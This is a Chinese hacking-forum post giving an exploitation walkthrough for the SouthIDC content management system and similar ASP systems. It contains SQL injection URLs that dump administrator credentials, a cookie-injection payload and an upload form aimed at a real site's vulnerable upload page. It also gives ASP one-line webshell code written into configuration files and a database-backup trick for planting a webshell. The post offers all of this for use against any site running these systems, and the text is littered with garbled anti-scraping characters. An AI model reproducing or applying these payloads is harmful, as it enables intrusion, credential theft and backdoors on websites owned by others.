找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2369|回复: 0
打印 上一主题 下一主题

南方数据网站管理系统注入漏洞&后台拿WebShell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:06:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  /Databases/0791idc.mdb
  T0 r" \1 H6 N1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7 ' N7 n5 t& G  r  _' J# D
也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F77 v1 v6 b  Z0 ~% S) c+ G5 {2 ?( g
直接暴管理员帐号密码(md5)
0 ]1 N8 f3 D3 A, X2.登陆后台
" r- b) v  J  C$ j3.利用编辑器上传:
- A7 R# P/ y* r0 `访问admin/southidceditor/admin_style.asp- w; ?( v/ J, h2 ^" W
修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.2 n$ R1 s9 ]3 I$ M7 ?% C' k: w
) e1 h8 o% D5 v1 I3 C: @" x
========================================+ X* U3 k0 L& P  E

: g3 b) S; u1 `- P) j! x+ H参考资料整理:% f, w. Z2 I- M2 a4 d
南方数据、良精系统、网软天下漏洞利用, j" V# ^8 D. R) e- Y( |

, f6 F, k1 Z2 o1、通过upfile_other.asp漏洞文件直接取SHELL! o; L) k3 J8 B/ Y' R0 R" L; Y* O
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:
6 a' F% |9 y9 _  R7 a& i0 r<HTML><HEAD> 5 X6 \! Z) w* d+ h$ y( E! t9 d2 u
<META http-equiv=Content-Type content="text/html; charset=gb2312"> 2 R8 Z: @/ x# q& V9 C, S4 A- `3 O% l
<STYLE type=text/css>BODY {
% `' b: R4 V0 TFONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
1 K  s6 S5 h2 N}
/ t" T! r8 c0 H8 I$ X.tx1 {
. I' f$ W( |! T. ^1 NBORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
0 T& L& N; P$ c% i; _. x}
& m+ y$ J" Y* v  v3 o/ ~</STYLE>4 m0 A; Y9 H$ [; [+ Y6 n
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
2 c. {7 A4 H2 l# g<BODY leftMargin=0 topMargin=0>
6 L& ^, C) `6 P- O* ^<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post   y# t; T  ~- T: L/ V* I. I1 N
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit>
/ B1 a& x# {* }6 o<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>! t* H& _' C5 }0 D, m$ _. v

  N7 ]1 M/ a" R. W7 q将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。9 a/ v. w. Z# X
注:此方法通杀南方数据、良精系统、网软天下等8 n9 D+ Z: y% w' T" ^
4 U5 p; K2 I3 W. |1 y  T  M' g
2、通过注入秒杀管理员帐号密码,使用如下:
. f9 L% ~# x) U0 @/ E# B+ e. |http://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’
* S. E2 }* U/ P4 r# d1 Y/ \, j* K以上代码直接暴管理员帐号和密码,取SHELL方法如下:* s- l; E4 c/ M- u( l
在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’
/ k7 S5 i4 Z8 G9 U$ n9 A# d/ _( u成功把shell写入http://www.target.com/inc/config.asp* n  x$ o- p2 m, }; t' T8 I  Q
这里一句话chr(32)密码是“#”
' w  l3 h- \$ _/ i. h3、cookie注入* y$ L2 x: G5 M9 V' h* f* M" Z- p
清空地址栏,利用union语句来注入,提交:1 u+ |, ~5 a; |3 F* s
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))
6 R5 P9 y" R3 ^; P# x8 ^( `如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?8 y" }, f+ Z7 |6 \
注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。
. m/ ^9 @1 M; K% N8 ^0 D; R(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)1 E. w4 ]0 Q7 ~- Q' a/ b: {

% K/ u* G! Y$ M* _三、后台取SHELL方法总结" B# a- f* l" l
(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:
: H! q7 k7 a3 ^- h6 R, t4 b然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,* x3 o" A" h" ?6 U: r8 w
这时再打开一句话马的客户端,提交同样得到一个小马
) t& `1 ?# A4 q* ^% ^(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)
. ~/ s9 l" P% Y  D+ L% |(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:
9 I  V- R( D, E/ Y/ r) gif fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
6 x: j( u5 q6 K6 S6 }5 v2 Y* FEnableUpload=false1 z* [% o1 o" K5 x  x
+ h" U9 K; Z3 H6 K" b
end if ( V4 N1 V* X: a- f
if EnableUpload=false then
% T. v% g- ^8 V5 Umsg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType
8 v, u& V7 y" w, zFoundErr=true
1 ]! p4 d$ N, W9 X/ f: x& Fend if, h' ?; n, ^  {! y$ o
大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:0 Z. h4 `: `4 C; i4 O
提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)
& \8 {% K8 O7 a(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的& b9 u$ @* B5 ]7 D4 t
( j. t( e2 R8 _6 g  Z
点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的
. H* `) f; V. H* e" @直接访问备份后的地址,就得到一个webshell
# n1 ?9 a- m; t3 e* q2 g6 m(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表